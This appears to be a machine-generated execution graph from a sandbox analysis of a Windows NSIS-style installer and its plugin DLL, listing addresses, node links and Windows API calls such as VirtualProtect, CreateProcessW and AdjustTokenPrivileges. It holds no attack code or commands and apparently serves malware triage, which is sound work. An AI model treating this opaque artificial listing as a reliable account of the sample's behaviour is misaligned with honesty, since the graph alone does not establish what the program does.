                                                                            execution_graph 3057 6e351774 3058 6e3517a3 3057->3058 3059 6e351bff 22 API calls 3058->3059 3060 6e3517aa 3059->3060 3061 6e3517b1 3060->3061 3062 6e3517bd 3060->3062 3063 6e351312 2 API calls 3061->3063 3064 6e3517e4 3062->3064 3065 6e3517c7 3062->3065 3068 6e3517bb 3063->3068 3066 6e35180e 3064->3066 3067 6e3517ea 3064->3067 3069 6e3515dd 3 API calls 3065->3069 3071 6e3515dd 3 API calls 3066->3071 3070 6e351654 3 API calls 3067->3070 3072 6e3517cc 3069->3072 3073 6e3517ef 3070->3073 3071->3068 3074 6e351654 3 API calls 3072->3074 3075 6e351312 2 API calls 3073->3075 3076 6e3517d2 3074->3076 3077 6e3517f5 GlobalFree 3075->3077 3078 6e351312 2 API calls 3076->3078 3077->3068 3080 6e351809 GlobalFree 3077->3080 3079 6e3517d8 GlobalFree 3078->3079 3079->3068 3080->3068 2292 6e351817 2293 6e35184a 2292->2293 2334 6e351bff 2293->2334 2295 6e351851 2296 6e351976 2295->2296 2297 6e351862 2295->2297 2298 6e351869 2295->2298 2384 6e35243e 2297->2384 2368 6e352480 2298->2368 2303 6e3518cd 2309 6e3518d3 2303->2309 2310 6e35191e 2303->2310 2304 6e3518af 2397 6e352655 2304->2397 2305 6e35187f 2308 6e351885 2305->2308 2312 6e351890 2305->2312 2306 6e351898 2318 6e35188e 2306->2318 2394 6e352e23 2306->2394 2308->2318 2378 6e352b98 2308->2378 2416 6e351666 2309->2416 2316 6e352655 10 API calls 2310->2316 2311 6e3518b5 2408 6e351654 2311->2408 2388 6e352810 2312->2388 2321 6e35190f 2316->2321 2318->2303 2318->2304 2333 6e351965 2321->2333 2422 6e352618 2321->2422 2323 6e351896 2323->2318 2324 6e352655 10 API calls 2324->2321 2328 6e35196f GlobalFree 2328->2296 2330 6e351951 2330->2333 2426 6e3515dd wsprintfW 2330->2426 2331 6e35194a FreeLibrary 2331->2330 2333->2296 2333->2328 2429 6e3512bb GlobalAlloc 2334->2429 2336 6e351c26 2430 6e3512bb GlobalAlloc 2336->2430 2338 6e351e6b GlobalFree GlobalFree GlobalFree 2339 6e351e88 2338->2339 2354 6e351ed2 2338->2354 2341 6e35227e 2339->2341 2350 6e351e9d 2339->2350 2339->2354 2340 6e351c31 2340->2338 2342 6e351d26 GlobalAlloc 2340->2342 2343 6e3521ae 2340->2343 2345 6e351d71 lstrcpyW 2340->2345 2346 6e351d8f GlobalFree 2340->2346 2349 6e351d7b lstrcpyW 2340->2349 2353 6e352126 2340->2353 2340->2354 2360 6e352067 GlobalFree 2340->2360 2362 6e3512cc 2 API calls 2340->2362 2363 6e351dcd 2340->2363 2344 6e3522a0 GetModuleHandleW 2341->2344 2341->2354 2342->2340 2343->2354 2365 6e352216 lstrcpyW 2343->2365 2347 6e3522c6 2344->2347 2348 6e3522b1 LoadLibraryW 2344->2348 2345->2349 2346->2340 2437 6e3516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2347->2437 2348->2347 2348->2354 2349->2340 2350->2354 2433 6e3512cc 2350->2433 2352 6e3522d8 2355 6e352318 2352->2355 2366 6e352302 GetProcAddress 2352->2366 2436 6e3512bb GlobalAlloc 2353->2436 2354->2295 2355->2354 2357 6e352325 lstrlenW 2355->2357 2438 6e3516bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2357->2438 2360->2340 2361 6e35233f 2361->2354 2362->2340 2363->2340 2431 6e35162f GlobalSize GlobalAlloc 2363->2431 2365->2354 2366->2355 2367 6e35212f 2367->2295 2370 6e352498 2368->2370 2369 6e3512cc GlobalAlloc lstrcpynW 2369->2370 2370->2369 2372 6e3525c1 GlobalFree 2370->2372 2373 6e352540 GlobalAlloc WideCharToMultiByte 2370->2373 2374 6e35256b GlobalAlloc 2370->2374 2376 6e352582 2370->2376 2440 6e35135a 2370->2440 2372->2370 2375 6e35186f 2372->2375 2373->2372 2374->2376 2375->2305 2375->2306 2375->2318 2376->2372 2444 6e3527a4 2376->2444 2380 6e352baa 2378->2380 2379 6e352c4f CreateFileA 2383 6e352c6d 2379->2383 2380->2379 2382 6e352d39 2382->2318 2447 6e352b42 2383->2447 2385 6e352453 2384->2385 2386 6e35245e GlobalAlloc 2385->2386 2387 6e351868 2385->2387 2386->2385 2387->2298 2392 6e352840 2388->2392 2389 6e3528ee 2391 6e3528f4 GlobalSize 2389->2391 2393 6e3528fe 2389->2393 2390 6e3528db GlobalAlloc 2390->2393 2391->2393 2392->2389 2392->2390 2393->2323 2395 6e352e2e 2394->2395 2396 6e352e6e GlobalFree 2395->2396 2451 6e3512bb GlobalAlloc 2397->2451 2399 6e3526d8 MultiByteToWideChar 2404 6e35265f 2399->2404 2400 6e35270b lstrcpynW 2400->2404 2401 6e3526fa StringFromGUID2 2401->2404 2402 6e35271e wsprintfW 2402->2404 2403 6e352742 GlobalFree 2403->2404 2404->2399 2404->2400 2404->2401 2404->2402 2404->2403 2405 6e352777 GlobalFree 2404->2405 2406 6e351312 2 API calls 2404->2406 2452 6e351381 2404->2452 2405->2311 2406->2404 2456 6e3512bb GlobalAlloc 2408->2456 2410 6e351659 2411 6e351666 2 API calls 2410->2411 2412 6e351663 2411->2412 2413 6e351312 2412->2413 2414 6e351355 GlobalFree 2413->2414 2415 6e35131b GlobalAlloc lstrcpynW 2413->2415 2414->2321 2415->2414 2417 6e351672 wsprintfW 2416->2417 2418 6e35169f lstrcpyW 2416->2418 2421 6e3516b8 2417->2421 2418->2421 2421->2324 2423 6e351931 2422->2423 2424 6e352626 2422->2424 2423->2330 2423->2331 2424->2423 2425 6e352642 GlobalFree 2424->2425 2425->2424 2427 6e351312 2 API calls 2426->2427 2428 6e3515fe 2427->2428 2428->2333 2429->2336 2430->2340 2432 6e35164d 2431->2432 2432->2363 2439 6e3512bb GlobalAlloc 2433->2439 2435 6e3512db lstrcpynW 2435->2354 2436->2367 2437->2352 2438->2361 2439->2435 2441 6e351361 2440->2441 2442 6e3512cc 2 API calls 2441->2442 2443 6e35137f 2442->2443 2443->2370 2445 6e3527b2 VirtualAlloc 2444->2445 2446 6e352808 2444->2446 2445->2446 2446->2376 2448 6e352b4d 2447->2448 2449 6e352b52 GetLastError 2448->2449 2450 6e352b5d 2448->2450 2449->2450 2450->2382 2451->2404 2453 6e3513ac 2452->2453 2454 6e35138a 2452->2454 2453->2404 2454->2453 2455 6e351390 lstrcpyW 2454->2455 2455->2453 2456->2410 2457 404108 2458 404120 2457->2458 2459 404281 2457->2459 2458->2459 2460 40412c 2458->2460 2461 404292 GetDlgItem GetDlgItem 2459->2461 2462 4042d2 2459->2462 2463 404137 SetWindowPos 2460->2463 2464 40414a 2460->2464 2465 404607 22 API calls 2461->2465 2466 40432c 2462->2466 2471 401389 2 API calls 2462->2471 2463->2464 2468 404153 ShowWindow 2464->2468 2469 404195 2464->2469 2470 4042bc SetClassLongW 2465->2470 2484 40427c 2466->2484 2530 404653 2466->2530 2472 404173 GetWindowLongW 2468->2472 2473 40426e 2468->2473 2474 4041b4 2469->2474 2475 40419d DestroyWindow 2469->2475 2476 40140b 2 API calls 2470->2476 2477 404304 2471->2477 2472->2473 2479 40418c ShowWindow 2472->2479 2569 40466e 2473->2569 2480 4041b9 SetWindowLongW 2474->2480 2481 4041ca 2474->2481 2486 404590 2475->2486 2476->2462 2477->2466 2483 404308 SendMessageW 2477->2483 2479->2469 2480->2484 2481->2473 2482 4041d6 GetDlgItem 2481->2482 2488 404204 2482->2488 2489 4041e7 SendMessageW IsWindowEnabled 2482->2489 2483->2484 2485 40140b 2 API calls 2521 40433e 2485->2521 2486->2484 2490 4045c1 ShowWindow 2486->2490 2487 404592 DestroyWindow EndDialog 2487->2486 2492 404211 2488->2492 2493 404258 SendMessageW 2488->2493 2494 404224 2488->2494 2503 404209 2488->2503 2489->2484 2489->2488 2490->2484 2492->2493 2492->2503 2493->2473 2497 404241 2494->2497 2498 40422c 2494->2498 2496 404607 22 API calls 2496->2521 2500 40140b 2 API calls 2497->2500 2563 40140b 2498->2563 2499 40423f 2499->2473 2502 404248 2500->2502 2502->2473 2502->2503 2566 4045e0 2503->2566 2505 4043b9 GetDlgItem 2506 4043d6 ShowWindow KiUserCallbackDispatcher 2505->2506 2507 4043ce 2505->2507 2553 404629 KiUserCallbackDispatcher 2506->2553 2507->2506 2509 404400 EnableWindow 2514 404414 2509->2514 2510 404419 GetSystemMenu EnableMenuItem SendMessageW 2511 404449 SendMessageW 2510->2511 2510->2514 2511->2514 2514->2510 2554 40463c SendMessageW 2514->2554 2555 4040e9 2514->2555 2558 406688 lstrcpynW 2514->2558 2516 404478 lstrlenW 2517 4066c5 21 API calls 2516->2517 2518 40448e SetWindowTextW 2517->2518 2559 401389 2518->2559 2520 4044d2 DestroyWindow 2520->2486 2522 4044ec CreateDialogParamW 2520->2522 2521->2484 2521->2485 2521->2487 2521->2496 2521->2520 2533 4066c5 2521->2533 2550 404607 2521->2550 2522->2486 2523 40451f 2522->2523 2524 404607 22 API calls 2523->2524 2525 40452a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2524->2525 2526 401389 2 API calls 2525->2526 2527 404570 2526->2527 2527->2484 2528 404578 ShowWindow 2527->2528 2529 404653 SendMessageW 2528->2529 2529->2486 2531 40466b 2530->2531 2532 40465c SendMessageW 2530->2532 2531->2521 2532->2531 2534 4066d0 2533->2534 2535 406917 2534->2535 2538 4068e8 lstrlenW 2534->2538 2542 4067e1 GetSystemDirectoryW 2534->2542 2543 4066c5 15 API calls 2534->2543 2544 4067f7 GetWindowsDirectoryW 2534->2544 2545 4066c5 15 API calls 2534->2545 2546 406889 lstrcatW 2534->2546 2549 406859 SHGetPathFromIDListW CoTaskMemFree 2534->2549 2583 406556 2534->2583 2588 406a7c GetModuleHandleA 2534->2588 2594 406936 2534->2594 2603 4065cf wsprintfW 2534->2603 2604 406688 lstrcpynW 2534->2604 2536 406930 2535->2536 2605 406688 lstrcpynW 2535->2605 2536->2521 2538->2534 2542->2534 2543->2538 2544->2534 2545->2534 2546->2534 2549->2534 2551 4066c5 21 API calls 2550->2551 2552 404612 SetDlgItemTextW 2551->2552 2552->2505 2553->2509 2554->2514 2556 4066c5 21 API calls 2555->2556 2557 4040f7 SetWindowTextW 2556->2557 2557->2514 2558->2516 2561 401390 2559->2561 2560 4013fe 2560->2521 2561->2560 2562 4013cb MulDiv SendMessageW 2561->2562 2562->2561 2564 401389 2 API calls 2563->2564 2565 401420 2564->2565 2565->2503 2567 4045e7 2566->2567 2568 4045ed SendMessageW 2566->2568 2567->2568 2568->2499 2570 404731 2569->2570 2571 404686 GetWindowLongW 2569->2571 2570->2484 2571->2570 2572 40469b 2571->2572 2572->2570 2573 4046c8 GetSysColor 2572->2573 2574 4046cb 2572->2574 2573->2574 2575 4046d1 SetTextColor 2574->2575 2576 4046db SetBkMode 2574->2576 2575->2576 2577 4046f3 GetSysColor 2576->2577 2578 4046f9 2576->2578 2577->2578 2579 404700 SetBkColor 2578->2579 2580 40470a 2578->2580 2579->2580 2580->2570 2581 404724 CreateBrushIndirect 2580->2581 2582 40471d DeleteObject 2580->2582 2581->2570 2582->2581 2606 4064f5 2583->2606 2586 4065ba 2586->2534 2587 40658a RegQueryValueExW RegCloseKey 2587->2586 2589 406aa2 GetProcAddress 2588->2589 2590 406a98 2588->2590 2592 406ab1 2589->2592 2610 406a0c GetSystemDirectoryW 2590->2610 2592->2534 2593 406a9e 2593->2589 2593->2592 2600 406943 2594->2600 2595 4069b9 2596 4069be CharPrevW 2595->2596 2599 4069df 2595->2599 2596->2595 2597 4069ac CharNextW 2597->2595 2597->2600 2599->2534 2600->2595 2600->2597 2601 406998 CharNextW 2600->2601 2602 4069a7 CharNextW 2600->2602 2613 405f84 2600->2613 2601->2600 2602->2597 2603->2534 2604->2534 2605->2536 2607 406504 2606->2607 2608 406508 2607->2608 2609 40650d RegOpenKeyExW 2607->2609 2608->2586 2608->2587 2609->2608 2611 406a2e wsprintfW LoadLibraryExW 2610->2611 2611->2593 2614 405f8a 2613->2614 2615 405fa0 2614->2615 2616 405f91 CharNextW 2614->2616 2615->2600 2616->2614 3110 6e35103d 3111 6e35101b 5 API calls 3110->3111 3112 6e351056 3111->3112 2617 6e352a7f 2618 6e352acf 2617->2618 2619 6e352a8f VirtualProtect 2617->2619 2619->2618 2620 40364b SetErrorMode GetVersionExW 2621 4036d7 2620->2621 2622 40369f GetVersionExW 2620->2622 2623 40372e 2621->2623 2624 406a7c 5 API calls 2621->2624 2622->2621 2625 406a0c 3 API calls 2623->2625 2624->2623 2626 403744 lstrlenA 2625->2626 2626->2623 2627 403754 2626->2627 2628 406a7c 5 API calls 2627->2628 2629 40375b 2628->2629 2630 406a7c 5 API calls 2629->2630 2631 403762 2630->2631 2632 406a7c 5 API calls 2631->2632 2633 40376e #17 OleInitialize SHGetFileInfoW 2632->2633 2709 406688 lstrcpynW 2633->2709 2636 4037bd GetCommandLineW 2710 406688 lstrcpynW 2636->2710 2638 4037cf 2639 405f84 CharNextW 2638->2639 2640 4037f5 CharNextW 2639->2640 2648 403807 2640->2648 2641 403909 2642 40391d GetTempPathW 2641->2642 2711 40361a 2642->2711 2644 403935 2645 403939 GetWindowsDirectoryW lstrcatW 2644->2645 2646 40398f DeleteFileW 2644->2646 2649 40361a 12 API calls 2645->2649 2721 4030d5 GetTickCount GetModuleFileNameW 2646->2721 2647 405f84 CharNextW 2647->2648 2648->2641 2648->2647 2654 40390b 2648->2654 2651 403955 2649->2651 2651->2646 2653 403959 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2651->2653 2652 4039a3 2660 405f84 CharNextW 2652->2660 2691 403a4a 2652->2691 2701 403a5a 2652->2701 2655 40361a 12 API calls 2653->2655 2820 406688 lstrcpynW 2654->2820 2658 403987 2655->2658 2658->2646 2658->2701 2673 4039c2 2660->2673 2662 403ba8 2893 405ce8 2662->2893 2663 403bcc 2664 403c50 ExitProcess 2663->2664 2665 403bd4 GetCurrentProcess OpenProcessToken 2663->2665 2667 403c20 2665->2667 2668 403bec LookupPrivilegeValueW AdjustTokenPrivileges 2665->2668 2675 406a7c 5 API calls 2667->2675 2668->2667 2669 403a20 2821 40605f 2669->2821 2670 403a63 2806 405c53 2670->2806 2673->2669 2673->2670 2685 403c27 2675->2685 2680 403c3c ExitWindowsEx 2680->2664 2682 403c49 2680->2682 2681 403a82 2684 403a9a 2681->2684 2837 406688 lstrcpynW 2681->2837 2686 40140b 2 API calls 2682->2686 2690 403ac0 wsprintfW 2684->2690 2684->2701 2704 406448 40 API calls 2684->2704 2705 4066c5 21 API calls 2684->2705 2707 403bbe CloseHandle 2684->2707 2817 405c6b CreateProcessW 2684->2817 2881 4069e5 FindFirstFileW 2684->2881 2685->2680 2685->2682 2686->2664 2687 403a3f 2836 406688 lstrcpynW 2687->2836 2692 4066c5 21 API calls 2690->2692 2750 403d5a 2691->2750 2695 403ae4 2692->2695 2696 403b36 SetCurrentDirectoryW 2695->2696 2697 403afc GetFileAttributesW 2695->2697 2810 405bdc CreateDirectoryW 2695->2810 2838 405c36 CreateDirectoryW 2695->2838 2813 406448 MoveFileExW 2696->2813 2698 403b13 2697->2698 2699 403b08 DeleteFileW 2697->2699 2698->2684 2698->2690 2698->2701 2841 405d94 2698->2841 2699->2698 2884 403c68 2701->2884 2704->2684 2705->2684 2707->2701 2709->2636 2710->2638 2712 406936 5 API calls 2711->2712 2714 403626 2712->2714 2713 403630 2713->2644 2714->2713 2897 405f57 lstrlenW CharPrevW 2714->2897 2717 405c36 2 API calls 2718 40363e 2717->2718 2900 4061a7 2718->2900 2904 406178 GetFileAttributesW CreateFileW 2721->2904 2723 403118 2749 403125 2723->2749 2905 406688 lstrcpynW 2723->2905 2725 40313b 2906 405fa3 lstrlenW 2725->2906 2729 40314c GetFileSize 2730 40324b 2729->2730 2731 403163 2729->2731 2911 403033 2730->2911 2731->2730 2736 4032e9 2731->2736 2743 403033 36 API calls 2731->2743 2731->2749 2942 4035ed 2731->2942 2735 40328e GlobalAlloc 2738 4061a7 2 API calls 2735->2738 2739 403033 36 API calls 2736->2739 2741 4032b9 CreateFileW 2738->2741 2739->2749 2740 40326f 2742 4035ed ReadFile 2740->2742 2744 4032f3 2741->2744 2741->2749 2745 40327a 2742->2745 2743->2731 2926 403603 SetFilePointer 2744->2926 2745->2735 2745->2749 2747 403301 2927 40337c 2747->2927 2749->2652 2751 406a7c 5 API calls 2750->2751 2752 403d6e 2751->2752 2753 403d74 2752->2753 2754 403d86 2752->2754 2989 4065cf wsprintfW 2753->2989 2755 406556 3 API calls 2754->2755 2756 403db6 2755->2756 2757 403dd5 lstrcatW 2756->2757 2759 406556 3 API calls 2756->2759 2760 403d84 2757->2760 2759->2757 2981 404030 2760->2981 2763 40605f 18 API calls 2764 403e07 2763->2764 2765 403e9b 2764->2765 2767 406556 3 API calls 2764->2767 2766 40605f 18 API calls 2765->2766 2768 403ea1 2766->2768 2773 403e39 2767->2773 2769 403eb1 LoadImageW 2768->2769 2770 4066c5 21 API calls 2768->2770 2771 403f57 2769->2771 2772 403ed8 RegisterClassW 2769->2772 2770->2769 2775 40140b 2 API calls 2771->2775 2774 403f0e SystemParametersInfoW CreateWindowExW 2772->2774 2805 403f61 2772->2805 2773->2765 2776 403e5a lstrlenW 2773->2776 2777 405f84 CharNextW 2773->2777 2774->2771 2780 403f5d 2775->2780 2778 403e68 lstrcmpiW 2776->2778 2779 403e8e 2776->2779 2781 403e57 2777->2781 2778->2779 2782 403e78 GetFileAttributesW 2778->2782 2783 405f57 3 API calls 2779->2783 2785 404030 22 API calls 2780->2785 2780->2805 2781->2776 2784 403e84 2782->2784 2786 403e94 2783->2786 2784->2779 2787 405fa3 2 API calls 2784->2787 2788 403f6e 2785->2788 2990 406688 lstrcpynW 2786->2990 2787->2779 2790 403f7a ShowWindow 2788->2790 2791 403ffd 2788->2791 2793 406a0c 3 API calls 2790->2793 2991 4057e0 OleInitialize 2791->2991 2795 403f92 2793->2795 2794 404003 2796 404007 2794->2796 2797 40401f 2794->2797 2798 403fa0 GetClassInfoW 2795->2798 2802 406a0c 3 API calls 2795->2802 2804 40140b 2 API calls 2796->2804 2796->2805 2801 40140b 2 API calls 2797->2801 2799 403fb4 GetClassInfoW RegisterClassW 2798->2799 2800 403fca DialogBoxParamW 2798->2800 2799->2800 2803 40140b 2 API calls 2800->2803 2801->2805 2802->2798 2803->2805 2804->2805 2805->2701 2807 406a7c 5 API calls 2806->2807 2808 403a68 lstrlenW 2807->2808 2809 406688 lstrcpynW 2808->2809 2809->2681 2811 405c28 2810->2811 2812 405c2c GetLastError 2810->2812 2811->2695 2812->2811 2814 403b45 CopyFileW 2813->2814 2815 40645c 2813->2815 2814->2684 2814->2701 2999 4062ce 2815->2999 2818 405caa 2817->2818 2819 405c9e CloseHandle 2817->2819 2818->2684 2819->2818 2820->2642 3033 406688 lstrcpynW 2821->3033 2823 406070 3034 406002 CharNextW CharNextW 2823->3034 2826 403a2c 2826->2701 2835 406688 lstrcpynW 2826->2835 2827 406936 5 API calls 2833 406086 2827->2833 2828 4060b7 lstrlenW 2829 4060c2 2828->2829 2828->2833 2830 405f57 3 API calls 2829->2830 2832 4060c7 GetFileAttributesW 2830->2832 2831 4069e5 2 API calls 2831->2833 2832->2826 2833->2826 2833->2828 2833->2831 2834 405fa3 2 API calls 2833->2834 2834->2828 2835->2687 2836->2691 2837->2684 2839 405c46 2838->2839 2840 405c4a GetLastError 2838->2840 2839->2695 2840->2839 2842 40605f 18 API calls 2841->2842 2843 405db4 2842->2843 2844 405dd3 2843->2844 2845 405dbc DeleteFileW 2843->2845 2847 405efe 2844->2847 3040 406688 lstrcpynW 2844->3040 2846 405f0a 2845->2846 2846->2698 2847->2846 2854 4069e5 2 API calls 2847->2854 2849 405df9 2850 405e0c 2849->2850 2851 405dff lstrcatW 2849->2851 2853 405fa3 2 API calls 2850->2853 2852 405e12 2851->2852 2855 405e22 lstrcatW 2852->2855 2856 405e18 2852->2856 2853->2852 2857 405f18 2854->2857 2859 405e2d lstrlenW FindFirstFileW 2855->2859 2856->2855 2856->2859 2857->2846 2858 405f1c 2857->2858 2860 405f57 3 API calls 2858->2860 2861 405ef3 2859->2861 2879 405e4f 2859->2879 2862 405f22 2860->2862 2861->2847 2864 405d4c 5 API calls 2862->2864 2863 405ed6 FindNextFileW 2867 405eec FindClose 2863->2867 2863->2879 2866 405f2e 2864->2866 2868 405f32 2866->2868 2869 405f48 2866->2869 2867->2861 2868->2846 2872 40570d 28 API calls 2868->2872 2871 40570d 28 API calls 2869->2871 2871->2846 2874 405f3f 2872->2874 2873 405d94 64 API calls 2873->2879 2876 406448 40 API calls 2874->2876 2875 40570d 28 API calls 2875->2863 2877 405f46 2876->2877 2877->2846 2878 40570d 28 API calls 2878->2879 2879->2863 2879->2873 2879->2875 2879->2878 2880 406448 40 API calls 2879->2880 3041 406688 lstrcpynW 2879->3041 3042 405d4c 2879->3042 2880->2879 2882 4069fb FindClose 2881->2882 2883 406a06 2881->2883 2882->2883 2883->2684 2885 403c83 2884->2885 2886 403c79 CloseHandle 2884->2886 2887 403c97 2885->2887 2888 403c8d CloseHandle 2885->2888 2886->2885 3053 403cc5 2887->3053 2888->2887 2891 405d94 71 API calls 2892 403b9b OleUninitialize 2891->2892 2892->2662 2892->2663 2894 405cfd 2893->2894 2895 403bb6 ExitProcess 2894->2895 2896 405d11 MessageBoxIndirectW 2894->2896 2896->2895 2898 405f73 lstrcatW 2897->2898 2899 403638 2897->2899 2898->2899 2899->2717 2901 4061b4 GetTickCount GetTempFileNameW 2900->2901 2902 403649 2901->2902 2903 4061ea 2901->2903 2902->2644 2903->2901 2903->2902 2904->2723 2905->2725 2907 405fb1 2906->2907 2908 403141 2907->2908 2909 405fb7 CharPrevW 2907->2909 2910 406688 lstrcpynW 2908->2910 2909->2907 2909->2908 2910->2729 2912 403044 2911->2912 2913 40305c 2911->2913 2916 403054 2912->2916 2917 40304d DestroyWindow 2912->2917 2914 403064 2913->2914 2915 40306c GetTickCount 2913->2915 2946 406ab8 2914->2946 2915->2916 2919 40307a 2915->2919 2916->2735 2916->2749 2945 403603 SetFilePointer 2916->2945 2917->2916 2920 403082 2919->2920 2921 4030af CreateDialogParamW ShowWindow 2919->2921 2920->2916 2950 403017 2920->2950 2921->2916 2923 403090 wsprintfW 2953 40570d 2923->2953 2926->2747 2928 4033a7 2927->2928 2929 40338b SetFilePointer 2927->2929 2964 403484 GetTickCount 2928->2964 2929->2928 2932 403444 2932->2749 2935 403484 42 API calls 2936 4033de 2935->2936 2936->2932 2937 40344a ReadFile 2936->2937 2939 4033ed 2936->2939 2937->2932 2939->2932 2940 4061fb ReadFile 2939->2940 2978 40622a WriteFile 2939->2978 2940->2939 2943 4061fb ReadFile 2942->2943 2944 403600 2943->2944 2944->2731 2945->2740 2947 406ad5 PeekMessageW 2946->2947 2948 406ae5 2947->2948 2949 406acb DispatchMessageW 2947->2949 2948->2916 2949->2947 2951 403026 2950->2951 2952 403028 MulDiv 2950->2952 2951->2952 2952->2923 2954 405728 2953->2954 2963 4030ad 2953->2963 2955 405744 lstrlenW 2954->2955 2956 4066c5 21 API calls 2954->2956 2957 405752 lstrlenW 2955->2957 2958 40576d 2955->2958 2956->2955 2959 405764 lstrcatW 2957->2959 2957->2963 2960 405780 2958->2960 2961 405773 SetWindowTextW 2958->2961 2959->2958 2962 405786 SendMessageW SendMessageW SendMessageW 2960->2962 2960->2963 2961->2960 2962->2963 2963->2916 2965 4034b2 2964->2965 2966 4035dc 2964->2966 2980 403603 SetFilePointer 2965->2980 2967 403033 36 API calls 2966->2967 2969 4033ae 2967->2969 2969->2932 2976 4061fb ReadFile 2969->2976 2970 4034bd SetFilePointer 2972 4034e2 2970->2972 2971 4035ed ReadFile 2971->2972 2972->2969 2972->2971 2973 403033 36 API calls 2972->2973 2974 40622a WriteFile 2972->2974 2975 4035bd SetFilePointer 2972->2975 2973->2972 2974->2972 2975->2966 2977 4033c7 2976->2977 2977->2932 2977->2935 2979 406248 2978->2979 2979->2939 2980->2970 2982 404044 2981->2982 2998 4065cf wsprintfW 2982->2998 2984 4040b5 2985 4040e9 22 API calls 2984->2985 2987 4040ba 2985->2987 2986 403de5 2986->2763 2987->2986 2988 4066c5 21 API calls 2987->2988 2988->2987 2989->2760 2990->2765 2992 404653 SendMessageW 2991->2992 2997 405803 2992->2997 2993 404653 SendMessageW 2994 40583c OleUninitialize 2993->2994 2994->2794 2995 40582a 2995->2993 2996 401389 2 API calls 2996->2997 2997->2995 2997->2996 2998->2984 3000 406324 GetShortPathNameW 2999->3000 3001 4062fe 2999->3001 3003 406443 3000->3003 3004 406339 3000->3004 3026 406178 GetFileAttributesW CreateFileW 3001->3026 3003->2814 3004->3003 3006 406341 wsprintfA 3004->3006 3005 406308 CloseHandle GetShortPathNameW 3005->3003 3007 40631c 3005->3007 3008 4066c5 21 API calls 3006->3008 3007->3000 3007->3003 3009 406369 3008->3009 3027 406178 GetFileAttributesW CreateFileW 3009->3027 3011 406376 3011->3003 3012 406385 GetFileSize GlobalAlloc 3011->3012 3013 4063a7 3012->3013 3014 40643c CloseHandle 3012->3014 3015 4061fb ReadFile 3013->3015 3014->3003 3016 4063af 3015->3016 3016->3014 3028 4060dd lstrlenA 3016->3028 3019 4063c6 lstrcpyA 3022 4063e8 3019->3022 3020 4063da 3021 4060dd 4 API calls 3020->3021 3021->3022 3023 40641f SetFilePointer 3022->3023 3024 40622a WriteFile 3023->3024 3025 406435 GlobalFree 3024->3025 3025->3014 3026->3005 3027->3011 3029 40611e lstrlenA 3028->3029 3030 406126 3029->3030 3031 4060f7 lstrcmpiA 3029->3031 3030->3019 3030->3020 3031->3030 3032 406115 CharNextA 3031->3032 3032->3029 3033->2823 3035 40601f 3034->3035 3037 406031 3034->3037 3036 40602c CharNextW 3035->3036 3035->3037 3039 406055 3036->3039 3038 405f84 CharNextW 3037->3038 3037->3039 3038->3037 3039->2826 3039->2827 3040->2849 3041->2879 3050 406153 GetFileAttributesW 3042->3050 3045 405d67 RemoveDirectoryW 3048 405d75 3045->3048 3046 405d6f DeleteFileW 3046->3048 3047 405d79 3047->2879 3048->3047 3049 405d85 SetFileAttributesW 3048->3049 3049->3047 3051 405d58 3050->3051 3052 406165 SetFileAttributesW 3050->3052 3051->3045 3051->3046 3051->3047 3052->3051 3054 403cd3 3053->3054 3055 403c9c 3054->3055 3056 403cd8 FreeLibrary GlobalFree 3054->3056 3055->2891 3056->3055 3056->3056 3126 6e351979 3128 6e35199c 3126->3128 3127 6e3519e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3130 6e351312 2 API calls 3127->3130 3128->3127 3129 6e3519d1 GlobalFree 3128->3129 3129->3127 3131 6e351b6e GlobalFree GlobalFree 3130->3131 3136 6e351058 3137 6e351074 3136->3137 3138 6e3510dd 3137->3138 3139 6e3515b6 GlobalFree 3137->3139 3140 6e351092 3137->3140 3139->3140 3141 6e3515b6 GlobalFree 3140->3141 3142 6e3510a2 3141->3142 3143 6e3510b2 3142->3143 3144 6e3510a9 GlobalSize 3142->3144 3145 6e3510b6 GlobalAlloc 3143->3145 3146 6e3510c7 3143->3146 3144->3143 3147 6e3515dd 3 API calls 3145->3147 3148 6e3510d2 GlobalFree 3146->3148 3147->3146 3148->3138 3081 6e3510e1 3087 6e351111 3081->3087 3082 6e3512b0 GlobalFree 3083 6e3511d7 GlobalAlloc 3083->3087 3084 6e351240 GlobalFree 3084->3087 3085 6e35135a 2 API calls 3085->3087 3086 6e3512ab 3086->3082 3087->3082 3087->3083 3087->3084 3087->3085 3087->3086 3088 6e351312 2 API calls 3087->3088 3089 6e35129a GlobalFree 3087->3089 3090 6e351381 lstrcpyW 3087->3090 3091 6e35116b GlobalAlloc 3087->3091 3088->3087 3089->3087 3090->3087 3091->3087 3092 6e351000 3095 6e35101b 3092->3095 3102 6e3515b6 3095->3102 3097 6e351020 3098 6e351024 3097->3098 3099 6e351027 GlobalAlloc 3097->3099 3100 6e3515dd 3 API calls 3098->3100 3099->3098 3101 6e351019 3100->3101 3103 6e3515bc 3102->3103 3104 6e3515c2 3103->3104 3105 6e3515ce GlobalFree 3103->3105 3104->3097 3105->3097 3106 6e352d43 3107 6e352d5b 3106->3107 3108 6e35162f 2 API calls 3107->3108 3109 6e352d76 3108->3109 3113 6e35170d 3114 6e3515b6 GlobalFree 3113->3114 3117 6e351725 3114->3117 3115 6e35176b GlobalFree 3116 6e351740 3116->3115 3117->3115 3117->3116 3118 6e351757 VirtualFree 3117->3118 3118->3115 3119 402f98 3120 402fc3 3119->3120 3121 402faa SetTimer 3119->3121 3122 403011 3120->3122 3123 403017 MulDiv 3120->3123 3121->3120 3124 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 3123->3124 3124->3122 3132 6e3523e9 3133 6e352453 3132->3133 3134 6e35245e GlobalAlloc 3133->3134 3135 6e35247d 3133->3135 3134->3133

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
